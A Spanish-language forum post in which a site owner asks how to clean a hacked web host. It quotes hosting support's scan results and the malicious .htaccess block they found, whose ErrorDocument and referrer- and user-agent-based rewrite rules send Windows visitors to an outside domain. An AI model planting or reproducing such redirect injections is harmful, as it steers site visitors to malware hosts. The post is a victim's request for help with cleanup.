Lo primero de todo, para los moderadores, es decir que no se si esta pregunta está bien puesta aquí...Es que he visto que en el foro de virus y troyanos todo son dudas sobre como proteger o limpiar el pc...y mi problema está en "mi sitio", no en mi pc. Si la pregunta está en el lugar equivocado, cambiarla de sección y por favor decidme donde la habéis puesto.
Gracias.
Mi consulta es...
Tengo un sitio alojado en WebHostingBuzz. Lo uso sólo para almacenar fotografías y vídeos para enseñárselos a los amigos.
Desde hace un mes Firefox advierte de que mio sitio es una "web atacante".
Me puse en contacto con el servicio técnico del host, me escanearon el sitio y me dijeron que no encontraron ningún virus:
Código:
Pero el Firefox seguía bloqueando la entrada y decía que el sitio aún era "sospechoso".We have scanned your catalogue public_html with the help of ClamAv for viruses and malware. Please find the results below: --------------------------------------------------- [root@ss4 public_html]# clamscan -ir ./ ----------- SCAN SUMMARY ----------- Known viruses: 823107 Engine version: 0.95.3 Scanned directories: 680 Scanned files: 150083 Infected files: 0 Data scanned: 11531.53 MB Data read: 11692.98 MB (ratio 0.99:1) Time: 2959.362 sec (49 m 19 s) --------------------------------------------------- If you are sure that your content does not contain any viruses, please send an inquiry for your site re-rating using Google Webmaster Tools. If nothing is found, the warning screen will be removed
Me puse en contacto con el soporte de WHB y me volvieron a escanear el sitio y me dijeron esto:
Código:
Y me lo limpiaron...Me crearon un htaccess nuevo, y me renombraron el viejo como htacccess_old.Dear Customer,
I have found what exactly has been hacked on your site. In your .htaccess file the following redirects have been implemented, you can see them below. I renamed your .htaccess file to .htaccess_old. Now you need to change all your passwords and check your computer for viruses. Also you need to contact google support team in order to whitelist your site.
ErrorDocument 500 http://ns2.onlyyoulifestyle.com/main.php?i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=0
ErrorDocument 502 http://ns2.onlyyoulifestyle.com/main.php?i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=2
ErrorDocument 403 http://ns2.onlyyoulifestyle.com/main.php?i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=3
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.onlyyoulifestyle.com/main.php?h=%{HTTP_HOST}&i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=r [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.onlyyoulifestyle.com/main.php?h=%{HTTP_HOST}&i=J8iuj9sdq/2ljBj7U8tOzpkXoQ==&e=4 [R,L]
Pero el sitio seguía siendo "sospechoso" para Google...Y los del soporte me dijeron que hiciera un backup y escaneara a fondo el sitio, buscando scripts to onlyyoulifestyle y el optro sitio raro...y los borrara.
MI CONSULTA ES...
He encontrado en muchos archivos htaccess, en carpetas y subcarpetas, lo mismo, exactamente igual, que lo que pongo en el "code" anterior.
¿Qué debo hacer?
¿Borrar todo eso y dejar los htaccess limpios y en blanco? ¿se pueden quedar en blanco?
¿Debo de buscar en otros tipos de archivos o sólo en los de texto?
¿Debo de tener cuidado al borrar estos archivos, eliminar estos textos...Es que tengo miedo de borrar algo importante por error.
Y por último...¡¡¿¿Como coño ha llegado esto hasta mi host??!! ¡¡¿¿Lo he "subido" yo sin querer??!!
Por favor, ¿puede alguien ayudarme...y explicármelo...porque soy bastante ignorante en estos temas.
Gracias, y perdonad si la pregunta no está en el sitio adecuado.
Un saludo
ll
